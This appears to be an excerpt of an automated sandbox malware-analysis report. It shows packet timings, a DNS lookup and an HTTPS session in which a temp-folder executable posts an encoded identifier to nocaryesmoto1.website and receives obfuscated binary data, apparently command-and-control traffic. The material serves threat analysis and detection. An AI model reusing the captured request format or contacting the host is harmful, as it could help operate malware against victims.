                                                                                                                                          Oct 19, 2024 19:53:58.796602964 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.796617031 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:59.126318932 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:59.126349926 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:59.126418114 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:59.126662016 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:59.126687050 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:59.736906052 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:59.736999989 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:59.738171101 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:59.738192081 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:59.738405943 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:59.739120007 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:59.739156008 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:59.739166975 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:00.130415916 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:00.130450964 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:00.130517960 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:00.130584955 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:00.130605936 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:00.130630016 CEST49747443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:00.130641937 CEST44349747188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:01.574353933 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:01.574413061 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:01.576286077 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:01.576603889 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:01.576634884 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.188788891 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.188880920 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.190042973 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.190066099 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.190311909 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.190975904 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.191076040 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.191117048 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.191220045 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.191257000 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.191344023 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.191380024 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.751266956 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.751307011 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.751353025 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.751431942 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.751442909 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.751457930 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.751463890 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.819026947 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.819046974 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:02.819102049 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.819405079 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:02.819415092 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.444920063 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.444982052 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.446070910 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.446080923 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.446300983 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.446985006 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.447006941 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.447012901 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.870146990 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.870182991 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.870249033 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.870318890 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.870338917 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.870348930 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.870353937 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.925843000 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.925888062 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:03.926017046 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.926270962 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:03.926297903 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.528568029 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.528747082 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.530198097 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.530225992 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.530436993 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.531090021 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.531131983 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.531141996 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.917886019 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.917923927 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.918051958 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.918354988 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.918376923 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.918442011 CEST49775443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.918457985 CEST44349775188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.955966949 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.956002951 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:04.956079006 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.956330061 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:04.956345081 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:05.585638046 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:05.585726023 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:05.693802118 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:05.693814993 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:05.694048882 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:05.700604916 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:05.700639009 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:05.700670004 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.104619026 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.104655981 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.104715109 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.104823112 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.104844093 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.104856968 CEST49781443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.104862928 CEST44349781188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.332863092 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.332916021 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.333007097 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.333271980 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.333287001 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.960750103 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.960830927 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.962049961 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.962063074 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.962383032 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.965977907 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.966201067 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.966238022 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.966335058 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.966373920 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.966496944 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.966564894 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:06.966630936 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:06.966648102 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:07.794807911 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:07.794867039 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:07.794976950 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:07.795203924 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:07.795213938 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:07.795222998 CEST49787443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:07.795228004 CEST44349787188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:07.830591917 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:07.830692053 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:07.830770016 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:07.831023932 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:07.831054926 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.455562115 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.455646038 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:08.456751108 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:08.456779003 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.457112074 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.457772017 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:08.457814932 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:08.457868099 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.850019932 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.850074053 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.850169897 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:08.850228071 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:08.850260973 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:08.850287914 CEST49798443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:08.850303888 CEST44349798188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:35.221565008 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:35.221597910 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:35.221672058 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:35.222414970 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:35.222429991 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:35.850641966 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:35.850709915 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:35.851912975 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:35.851923943 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:35.852122068 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:35.895241976 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:35.895263910 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:35.895323038 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:36.337596893 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:36.337636948 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:36.337835073 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:36.337872028 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:36.337872028 CEST49946443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:54:36.337893009 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:54:36.337904930 CEST44349946188.114.97.3192.168.2.4
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Oct 19, 2024 19:53:57.416600943 CEST5886253192.168.2.41.1.1.1
                                                                                                                                          Oct 19, 2024 19:53:57.436222076 CEST53588621.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Oct 19, 2024 19:53:57.416600943 CEST192.168.2.41.1.1.10xd02cStandard query (0)nocaryesmoto1.websiteA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Oct 19, 2024 19:53:57.436222076 CEST1.1.1.1192.168.2.40xd02cNo error (0)nocaryesmoto1.website188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                          Oct 19, 2024 19:53:57.436222076 CEST1.1.1.1192.168.2.40xd02cNo error (0)nocaryesmoto1.website188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                          • nocaryesmoto1.website
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449741188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:53:58 UTC351OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 96
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:53:58 UTC96OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 2d 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                          2024-10-19 17:53:58 UTC809INHTTP/1.1 200 OK
                                                                                                                                          Date: Sat, 19 Oct 2024 17:53:58 GMT
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDLbBVNsObnNrfIolfVkXTAtflMmS5%2BekZ1k9%2BCmmWx58auPgrvY92NX3KnLlmF43RmIufZJNOWXP%2FKgYZ0VXVQ5Fo6Z1jjvYGWyFQmSekXmKOP5wXCgGsyedNl42dxSS1KFvn5zvZQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a172aee8e9a9-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1083&delivery_rate=1693567&cwnd=251&unsent_bytes=0&cid=528794577354872e&ts=503&x=0"
                                                                                                                                          2024-10-19 17:53:58 UTC560INData Raw: 33 37 64 36 0d 0a 93 55 00 00 49 03 4b 04 00 00 00 00 00 00 00 00 11 0f b4 08 0e 00 04 00 ce 11 0f ce 0b 1d 14 f3 04 8d e1 a9 2e e8 5c 53 79 ea 1e 0e 63 08 12 00 08 00 c6 1e 0e c6 0b 1d 14 aa 08 8d 6e 94 8f c5 79 09 3a ba e5 c7 53 c9 f5 42 01 ab 0f 04 4d 08 12 00 09 00 c8 0f 04 c8 0b 1d 14 d0 08 8d 1a 26 61 91 c4 20 39 49 ee c2 ce d2 d6 c0 54 c0 cc a8 06 90 0d 12 00 25 00 c8 a8 06 c8 0b 1d 14 9a 08 8d 1a 26 61 91 c4 20 39 49 c4 e0 e8 b0 a6 da d4 ae 8e a8 b0 9a d4 da b6 84 da d0 c2 ee b0 d0 d6 ce ca d0 8a e8 e8 80 ca e0 ca 54 da d4 da 81 06 4e 03 12 00 08 00 c8 81 06 c8 0b 1d 14 dc 08 8d 1a 26 61 91 c4 20 39 49 ee c2 e0 e0 da d4 c6 ee 0a 02 4c 09 12 00 10 00 c8 0a 02 c8 0b 1d 14 c0 08 8d 1a 26 61 91 c4 20 39 49 42 8e a2 ac ac 82 94 a0 b6 84 96 90 80 82 ac
                                                                                                                                          Data Ascii: 37d6UIK.\Sycny:SBM&a 9IT%&a 9ITN&a 9IL&a 9IB
                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 85 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 92 8a 94 9a 84 82 ae a0 5c b2 05 7a 0a 12 00 09 00 c8 b2 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 92 8a 94 9a 84 82 ae a0 5c 03 01 65 0d 0e 00 04 00 ce 03 01 ce 0b 1d 14 c0 04 8d 61 84 8d 4d cc 7f 26 4e 6c 0a 80 09 12 00 08 00 c8 6c 0a c8 0b 1d 14 d0 08 8d 1a 26 61 91 c4 20 39 49 e8 ec d6 c4 da d0 c2 ee df 01 74 00 12 00 1f 00 c8 df 01 c8 0b 1d 14 9a 08 8d 1a 26 61 91 c4 20 39 49 c4 e0 e8 b0 84 da d0 c2 bc da d0 d0 ca b0 ec c2 ce c2 d4 e0 ee c2 ec e4 c2 ec ee 54 f8 d2 d0 76 0b a3 0d 12 00 11 00 c8 76 0b c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee b4 0e 6c 09 12 00 0b 00 c8 b4 0e c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e4 d4 ce ee c2 ec e4 c2
                                                                                                                                          Data Ascii: &a 9I\z&a 9I\eaM&Nll&a 9It&a 9ITvv&a 9Il&a 9I
                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 20 39 49 9a d4 da 84 da d0 c2 ae 00 dd 0a 12 00 06 00 c8 ae 00 c8 0b 1d 14 06 08 8d 1a 26 61 91 c4 20 39 49 5c 54 d6 e4 e8 d4 29 06 ec 0b 12 00 17 00 c8 29 06 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 e6 ca d0 d0 c2 e0 ee b0 8e d6 da d4 d6 d2 da b0 e6 ca d0 d0 c2 e0 ee 15 0b d7 01 12 00 11 00 c8 15 0b c8 0b 1d 14 c0 08 8d 1a 26 61 91 c4 20 39 49 4c c2 d4 ce ec fa e8 e0 c2 c0 b6 de c2 fa 4c 7c 4c 60 03 54 03 0e 00 04 00 ce 60 03 ce 0b 1d 14 f3 04 8d 99 22 e8 bb 24 3d 4a bc b4 05 85 0f 12 00 11 00 c8 b4 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee 7c 09 f3 0a 0e 00 04 00 ce 7c 09 ce 0b 1d 14 06 04 8d ff 19 f1 86 42 06 53 81 57 04 27 08 0e 00 04 00 ce 57 04 ce 0b 1d 14 f3 04 8d ec 35 0b d9 51 2e a9 de
                                                                                                                                          Data Ascii: 9I&a 9I\T))&a 9I&a 9ILL|L`T`"$=J&a 9I||BSW'W5Q.
                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 04 c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 ae 96 84 a0 a6 8a ac 82 b0 a0 da c6 c2 ec a4 94 8e 53 0e 48 0a 12 00 1a 00 c8 53 0e c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e4 d4 ce b0 ac c2 ca d0 a4 94 8e b0 ce d0 da c2 d4 e0 b0 8a e8 e8 80 ca e0 ca a2 0c 73 00 12 00 08 00 c6 a2 0c c6 0b 1d 14 d0 08 8d 3a 74 50 f0 17 14 ad d7 b3 27 8c fc 9b 5f 96 c6 59 07 cc 08 0e 00 04 00 ce 59 07 ce 0b 1d 14 f3 04 8d c5 25 ee 58 78 3e 4c 5f bd 08 d4 0a 0e 00 04 00 ce bd 08 ce 0b 1d 14 aa 04 8d 35 f1 51 9b 98 cd f3 9c 28 04 fe 0c 0e 00 04 00 ce 28 04 ce 0b 1d 14 c0 04 8d 1b a0 37 44 1c 7b 2a 56 88 02 4e 08 12 00 09 00 c8 88 02 c8 0b 1d 14 c0 08 8d 1a 26 61 91 c4 20 39 49 42 80 c2 ee de e0 d6 e8 42 24 04 c4 07 0e 00 04 00 ce 24 04 ce 0b 1d 14 f3 04 8d 58 62 b4 1d e5
                                                                                                                                          Data Ascii: &a 9ISHS&a 9Is:tP'_YY%Xx>L_5Q((7D{*VN&a 9IBB$$Xb
                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 04 8d be fa 35 9e a3 67 96 99 c9 0c 2f 0f 12 00 06 00 c8 c9 0c c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 ce d6 d4 c4 da c6 ac 05 0a 0f 12 00 1a 00 c8 ac 05 c8 0b 1d 14 9a 08 8d 1a 26 61 91 c4 20 39 49 a8 ec d6 c6 ec ca d2 ee b0 a6 da d4 ae 8e a8 b0 a6 da d4 ae 8e a8 54 da d4 da 93 02 69 01 12 00 06 00 c8 93 02 c8 0b 1d 14 0e 08 8d 1a 26 61 91 c4 20 39 49 ce d6 d4 c4 da c6 bc 0b 4d 0f 12 00 08 00 c6 bc 0b c6 0b 1d 14 9d 08 8d 59 70 1f 21 86 ea ca fc d3 23 c3 2d 0a a1 f1 ed e8 0c 71 04 0e 00 04 00 ce e8 0c ce 0b 1d 14 f3 04 8d a0 99 65 75 1d 63 32 77 67 05 10 06 12 00 11 00 c8 67 05 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee e0 06 92 08 12 00 07 00 c8 e0 06 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49
                                                                                                                                          Data Ascii: 5g/&a 9I&a 9ITi&a 9IMYp!#-qeuc2wgg&a 9I&a 9I
                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 61 91 c4 20 39 49 ce d6 d6 de da c2 ee 54 ee ea d0 da e0 c2 01 0e 32 08 0e 00 04 00 ce 01 0e ce 0b 1d 14 9d 04 8d 5e 1a 75 1a e3 e0 22 18 47 08 43 07 12 00 04 00 c8 47 08 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 5c 54 c0 cc 92 02 84 0a 12 00 08 00 c6 92 02 c6 0b 1d 14 9d 08 8d 57 e8 5a 5e 44 3b c8 39 de bb 86 52 c8 70 f3 28 4a 04 5b 03 12 00 0e 00 c8 4a 04 c8 0b 1d 14 d0 08 8d 1a 26 61 91 c4 20 39 49 c6 c2 ce de d6 b6 cc ec d6 e6 ee c2 ec ee 9c 0f f2 0c 12 00 11 00 c8 9c 0f c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee 96 03 a7 0a 0e 00 04 00 ce 96 03 ce 0b 1d 14 f3 04 8d 88 9e 42 1c 35 85 e0 1b e3 03 60 0e 12 00 07 00 c8 e3 03 c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e8 ec da e4 ca e0 c2 a5 09 fc
                                                                                                                                          Data Ascii: a 9IT2^u"GCG&a 9I\TWZ^D;9Rp(J[J&a 9I&a 9IB5`&a 9I
